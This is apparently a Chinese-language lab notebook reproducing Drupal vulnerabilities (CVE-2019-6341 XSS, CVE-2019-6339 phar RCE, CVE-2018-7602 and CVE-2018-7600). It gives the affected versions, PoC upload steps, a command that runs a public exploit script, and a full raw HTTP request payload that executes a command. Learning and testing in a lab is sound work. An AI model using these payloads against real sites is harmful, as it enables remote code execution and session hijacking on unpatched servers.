Drupal XSS漏洞(CVE-2019-6341)
影響軟件:Drupal
方式:通過文件模塊或者子系統上傳惡意文件觸發XSS漏洞
參考鏈接:[Drupal 1-click to RCE 分析](https://paper.seebug.org/897/)
效果:JS代碼執行(Cookies 資料竊取、會話劫持、釣魚欺騙、網頁掛馬等)
影響版本
在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。
實驗環境
drupal 8.5.0
復現
1.使用PoC上傳構造好的偽造GIF文件,PoC參考[thezdi/PoC](https://github.com/thezdi/PoC/tree/master/Drupal)的PoC。
2.訪問目標站點
#Drupal 的圖片默認存儲位置為 `/sites/default/files/pictures/<YYYY-MM>/`,默認存儲名稱為其原來的名稱,所以之后在利用漏洞時,可以知道上傳后的圖片的具體位置。
訪問 http://45.77.127.27:8080/sites/default/files/pictures/2021-05/_0 成功觸發xss
感覺么啥用啊,火狐和谷歌都攔截這個XSS,IE才能看到
Drupal 遠程代碼執行漏洞(CVE-2019-6339)
影響軟件:Drupal
方式:phar反序列化RCE
參考鏈接:[Drupal 1-click to RCE 分析](https://paper.seebug.org/897/)
效果:任意命令執行
這個漏洞得要管理員賬號登后台
實驗環境
同上
1.先使用管理員用戶上傳頭像,頭像圖片為構造好的 PoC,和上面實現一個github下載的gif
Drupal 的圖片默認存儲位置為 `/sites/default/files/pictures/<YYYY-MM>/`,默認存儲名稱為其原來的名稱,所以之后在利用漏洞時,可以知道上傳后的圖片的具體位置。
2.訪問 `http://127.0.0.1:8080/admin/config/media/file-system`,在 `Temporary directory(臨時目錄)` 處輸入之前上傳的圖片路徑,示例為 `phar://./sites/default/files/pictures/2019-06/blog-ZDI-CAN-7232-cat_0.jpg`,保存后將觸發該漏洞
phar://./sites/default/files/pictures/2021-05/blog-ZDI-CAN-7232-cat.jpg
Drupal 遠程代碼執行漏洞(CVE-2018-7602)
影響軟件:drupal
方式:對URL中的#進行編碼兩次,繞過sanitize()函數過濾
效果:任意命令執行
條件:知道賬號密碼
實驗環境
drupal 7.57
復現
1.整點腳本
https://github.com/pimps/CVE-2018-7600
2.用腳本
```bash
# "id"為要執行的命令 第一個drupal為用戶名 第二個drupal為密碼
python3 drupa7-CVE-2018-7602.py -c "id" drupal drupal http://127.0.0.1:8081/
```
沒有腳本這日子怎么過啊,什么時候能寫出自己的腳本發github上
Drupal 遠程代碼執行漏洞(CVE-2018-7600)
其6/7/8版本的Form API中存在一處遠程代碼執行漏洞
實驗環境
drupal 8.5.0
復現
我們向安裝完成的drupal發送如下數據包:
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
當然版本小於7.57的版本我們也可以用腳本
Drupal相關漏洞還有
CVE-2017-6920 -- 8.x的Drupal Core--遠程代碼執行,這是Drupal Core的YAML解析器處理不當所導致的一個遠程代碼執行漏洞,影響8.x的Drupal Core #需要管理員賬號密碼
CVE-2014-3704 -- Drupal < 7.32 -- SQL注入
這里就不復現了,遇到了再來折騰